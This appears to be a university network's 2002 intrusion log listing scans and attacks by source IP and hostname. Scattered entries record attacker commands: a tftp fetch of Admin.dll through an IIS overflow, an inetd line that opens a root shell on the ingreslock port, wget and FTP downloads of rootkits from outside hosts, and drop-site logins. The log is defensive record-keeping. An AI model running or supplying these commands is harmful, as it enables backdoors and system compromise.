2002/03/19-17:06:11.44 210.244.158.59 () scannet for port 111
2002/03/19-17:19:45.60 62.4.67.58 () scannet for ports 1024, 2072
2002/03/19-17:54:23.41 132.235.18.116 () portscan 216.136.224.142 for ports 37,5050,23,80,21,25,119,20 several times
2002/03/19-19:48:57.32 61.252.187.20 () scannet for port 60001
2002/03/19-23:55:35.90 206.113.56.193 () scannet for port 21
2002/03/20-00:39:00.03 207.54.186.44 () scannet for port 137
2002/03/20-00:51:30.68 207.54.186.44 () scan several ips for port 80
2002/03/20-11:05:28.92 142.169.51.21 () scannet for port 21
2002/03/20-12:46:15.63 132.235.144.195 () scannet for port 524
2002/03/20-20:00:00.75 61.177.253.121 () 1. start scan of net port 80
2002/03/20-20:00:00.75 61.177.253.121 () 2. Attack selected ips with buff overflow command:
2002/03/20-20:00:00.75 61.177.253.121 () 3. tftp%20-i%20132.235.80.92%20GET%20Admin.dll%20c:\Admin.dll
2002/03/20-20:27:37.21 144.136.234.162 () scannet for port 21
2002/03/20-22:29:02.41 172.129.110.118 () scannet for port 21
2002/03/21-02:38:46.23 217.128.252.200 () scannet with icmp superscan
2002/03/21-09:37:21.22 62.211.188.11 () scannet for port 21
2002/03/21-16:30:28.49 62.211.42.132 () scannet with icmp superscan
2002/03/21-16:30:29.43 62.211.42.132 () scannet for port 23
2002/03/21-22:06:05.20 193.231.74.12 () scannet for port 53
2002/03/21-22:06:05.50 193.231.74.12 () probe ports 111, 32776, 76t4 on s2 ips, statdx attack
2002/03/22-03:02:00.76 216.205.21.171 () scannet for ports 139,445,137
2002/03/22-03:03:07.55 216.205.21.171 () pound on 132.235.1.89 ports 445,139
2002/03/22-03:12:24.87 216.205.120.226 (226-216.205.120.dellhost.com) scannet for NET NULL session
2002/03/22-03:24:22.24 152.17.220.17 () scannet for NET NULL session
2002/03/22-08:16:22.63 216.205.21.171 () try to login 100s ips via ftp to pcs with user id found from scan of port 139
2002/03/22-16:05:08.76 80.14.25.31 () scannet for port 21
2002/03/22-19:21:03.00 129.1.200.138 () scannet for port 1214
2002/03/22-20:04:50.92 210.55.204.211 () scannet for port 111-portmap list
2002/03/23-03:20:54.72 193.251.67.186 () scannet for port 21
2002/03/23-06:03:00.75 61.132.4.114 () scannet for port 21
2002/03/23-21:02:19.80 132.235.238.1 (admin.memaud.ohiou.edu) scannet for NET NULL session
2002/03/24-00:28:48.57 202.66.92.132 () scannet for port 515
2002/03/24-08:32:22.48 202.99.176.28 () scannet for port 111 - portmap list
2002/03/24-10:31:51.33 202.99.176.28 () probe various ips for port 600 - portmap list
2002/03/24-10:31:51.33 202.99.176.28 () start of buff overflow attacks
2002/03/24-10:32:03.16 202.99.176.28 () start of buff overflow attacks port 32783,32790,32781
2002/03/24-11:20:46.89 80.11.244.221 () scannet for port 21
2002/03/24-12:30:09.17 213.201.169.150 () scannet for port 21
2002/03/24-14:30:35.83 204.244.65.77 () scannet for port 21
2002/03/24-17:21:48.00 132.156.28.75 () scannet for port 22
2002/03/24-18:08:34.70 212.67.238.20 () scannet for port 21
2002/03/24-21:23:55.51 129.32.96.173 () scannet for port 12345
2002/03/24-21:33:34.44 142.176.146.186 (mailhost.seatech.ns.ca) 1. scannet for port 1524, 6112
2002/03/24-21:33:34.44 142.176.146.186 (mailhost.seatech.ns.ca) 2. buff overflow attack on port 6112
2002/03/24-21:33:34.44 142.176.146.186 (mailhost.seatech.ns.ca) 3. echo "ingreslock stream tcp nowait root /bin/sh sh -i">/tmp/x ...
2002/03/25-00:40:54.26 80.14.77.91 () scannet for port 21
2002/03/25-12:55:56.62 217.128.68.108 () scannet for port 21
2002/03/26-08:17:28.00 218.186.91.183 (cm183.omega91.scvmaxonline.com.sg) scannet for port 21
2002/03/26-11:51:09.84 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for port 524
2002/03/26-13:41:09.43 212.108.224.214 (radnoti.vac.hu) scannet for port 21
2002/03/26-14:09:56.00 62.211.188.23 () scannet for port 21
2002/03/26-15:29:35.90 61.132.209.239 () scannet for ports 8000,8080,3128
2002/03/26-19:56:00.46 61.142.238.56 () scannet for port 111 - portmap list
2002/03/26-22:13:27.27 65.204.164.1 () scannet for port 21
2002/03/26-22:14:23.28 65.204.164.1 () buff overflow attack 132.235.1.7 port 6112
2002/03/27-01:08:15.28 65.94.189.169 (MTL-HSE-ppp191993.qc.sympatico.ca) scannet for port 80
2002/03/27-08:30:52.20 148.204.196.172 (Instituto Politecnico Nacional ) scannet for port 21
2002/03/27-08:35:05.03 148.204.196.172 (The attack came from Instituto Politecnico Nacional) successful attack via ftp buff overflow attack.
2002/03/27-08:46:15.01 66.104.123.116 (Hanyang University, Korea.) 1. follow up attack from 148.204.196.172, create users news,bobo
2002/03/27-08:46:15.01 66.104.123.116 (Hanyang University, Korea.) 2. attempt ftp to m-net.arbornet.org failed
2002/03/27-08:46:15.01 66.104.123.116 (Hanyang University, Korea.) 3. ftp 193.231.236.42 (bobolinoiuby/jmecerash) get epcs2,eu.tgz
2002/03/27-08:46:15.01 66.104.123.116 (Hanyang University, Korea.) 4. tried: wget www.geocities.com/bobo666ro/eu.tgz
2002/03/27-08:46:15.01 66.104.123.116 (Hanyang University, Korea.) 5. (ptrace setregs bug?) failed when executed.
2002/03/27-09:04:01.85 66.134.249.126 (h-66-134-249-126.NYCMNY83.covad.net) 1. IIS buff overflow attacks with command:
2002/03/27-09:04:01.85 66.134.249.126 (h-66-134-249-126.NYCMNY83.covad.net) 2. tftp%20-i%20132.65.78.238%20GET%20Admin.dll%20c:\Admin.dll
2002/03/27-09:14:09.07 61.132.210.126 (CHINANET Anhui province network,CN) scan net for port 8000,8080,3128
2002/03/27-09:51:16.49 132.235.8.76 (securityscan.cns.ohiou.edu) scannet with ping
2002/03/27-09:54:00.01 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for port 524
2002/03/27-10:03:42.89 61.132.208.186 (CHINANET Anhui province network,CN) scan several ips for port 8000
2002/03/27-16:09:23.94 62.204.197.138 (ccia-062-204-197-138.uned.es) scannet for port 60001
2002/03/27-17:11:49.12 66.130.72.141 (modemcable141.72-130-66.sherb.mc.videotron.ca) scannet for port 21
2002/03/28-01:19:32.16 202.96.216.160 (CHINANET Shanghai province network,CN) scannet for port 22
2002/03/28-03:00:53.13 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for port 524
2002/03/28-06:59:21.32 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) slow scan of net for port 524
2002/03/28-08:29:57.68 217.35.45.135 (host217-35-45-135.in-addr.btopenworld.com) scannet for port 80
2002/03/28-11:07:02.65 12.129.76.204 (ASV Cyber Solutions,GA,US) scannet for port 445
2002/03/28-12:19:50.79 213.229.84.173 (hoogeveen5-173.kabel.dekooi.nl) scannet for port 1025
2002/03/28-12:43:24.90 80.13.235.31 (AReims-104-1-2-31.abo.wanadoo.fr) scannet for port 21, anon ftp attack
2002/03/28-14:39:51.26 194.117.24.44 (panda.inescn.pt) scannet for port 21
2002/03/28-19:08:42.22 65.34.34.40 (c-65-34-34-40.se.client2.attbi.com) scannet for port 1025
2002/03/28-19:08:44.00 216.86.101.192 (101-192.sdial.gen.pacificcoast.net) scannet for port 1025
2002/03/28-19:09:46.35 206.148.146.186 (AGIS,Reston,VA) scannet for port 1025
2002/03/28-21:22:57.91 217.229.136.46 (pD9E5882E.dip.t-dialin.net) scannet for port 21
2002/03/28-22:24:25.93 66.77.93.3 (GalaxyNet Corporation ,CA,US) scannet for port 21
2002/03/28-22:31:05.85 66.77.93.3 (GalaxyNet Corporation ,CA,US) 1. ftpd buff overflow attack., successful
2002/03/28-22:31:05.85 66.77.93.3 (GalaxyNet Corporation ,CA,US) 2. /usr/bin/wget http://diablows.org/gold.tgz
2002/03/28-22:31:05.85 66.77.93.3 (GalaxyNet Corporation ,CA,US) 3. rpm -ivh --force ftp://ftp.intraware.com/pub/wget/wget-1_5_3-1_i386.rpm
2002/03/28-22:31:05.85 66.77.93.3 (GalaxyNet Corporation ,CA,US) 4. ftp www.bartweb.org (bartbb/hulig4n) cd public_html/adx/jacky;get rk.tgz
2002/03/29-09:07:56.65 202.185.243.121 (Ins Peny Minyak K.Sawit M'sia (PORIM),MY) scannet with ping
2002/03/29-09:08:02.30 202.185.243.121 (Ins Peny Minyak K.Sawit M'sia (PORIM),MY) probe ports 79,161,201 on all ips on net
2002/03/29-13:49:15.17 152.163.159.225 (rtc-ext1.ns.aol.com) attempt to use various ips as DNS.
2002/03/29-16:10:12.66 24.154.91.98 (acs-24-154-91-98.zoominternet.net) scannet for port 137 for netbios-name-query
2002/03/30-03:20:12.14 211.23.57.130 (CHTD, Chunghwa Telecom Co.,Ltd.,TW) scannet for port 21
2002/03/30-06:30:43.76 211.233.75.10 (KIDC,SEOUL,KR) scannet for port 21
2002/03/30-07:34:05.59 202.143.228.35 (INTERNET SERVICE PROVIDER,IN) attack IIS w/buff overflow=tftp%20-i%20132.0.0.7%20GET%20Admin.dll%20c
2002/03/30-08:17:41.03 61.177.247.36 (CHINANET Jiangsu province network,CN) attack IIS w/buff overflow=tftp%20-i%20132.235.80.92%20GET%20Admin.dll%20c:\Admin.dll
2002/03/30-10:00:12.69 203.197.214.121 (Leased line - CMC Limited, New Delhi,IN) portmap scan
2002/03/30-10:57:21.12 133.95.167.16 (Japan Network Information Center.JP) scannet for port 21
2002/03/30-11:10:33.86 61.120.74.228 (Kokusai-Kougyou-Kanda,JP) scannet for port 111,21
2002/03/30-11:28:35.55 217.86.10.222 (pD9560ADE.dip.t-dialin.net) scannet for port 21
2002/03/30-12:05:32.08 150.244.10.23 (grid001.ft.uam.es) scannet for port 21
2002/03/30-12:26:08.00 202.188.8.180 (as-8-180.tm.net.my) scannet with ping
2002/03/30-12:26:08.00 202.188.8.180 (as-8-180.tm.net.my) scannet with ping, for ports 79,161,21,23
2002/03/30-18:31:44.42 61.96.16.20 (LinuxPPC,KR) scannet for port 21
2002/03/30-19:10:38.69 63.208.234.195 (unknown.Level3.net) scan several ips for port 1214
2002/03/30-20:42:58.44 63.218.185.3 (CAIS Internet,McLean, VA,US) scannet for port 21
2002/03/31-02:35:16.09 12.8.184.58 (airlink-12-8-184-58.isla.net) attack previously broken in machine to hack attempts to fix it.
2002/03/31-04:32:43.01 210.187.192.81 (TMnet Telekom Malaysia,MY) scannet with ping
2002/03/31-04:32:49.39 210.187.192.81 (TMnet Telekom Malaysia.MY) scannet for ports 79, 161,1524
2002/03/31-05:02:32.28 210.187.192.81 (TMnet Telekom Malaysia.MY) try to login as root/root
2002/03/31-08:58:48.17 64.23.0.112 (ns.yakinaman.net) scannet for port 21
2002/03/31-10:33:03.45 203.149.135.194 (c194.h203149135.is.net.tw) scannet for port 22
2002/03/31-18:46:16.32 202.120.192.49 (Shanghai Education Commission,CN) scannet for port 21
2002/03/31-19:46:02.34 216.174.236.3 (CENTURY FUNDING GROUP, WA,US) scannet for port 21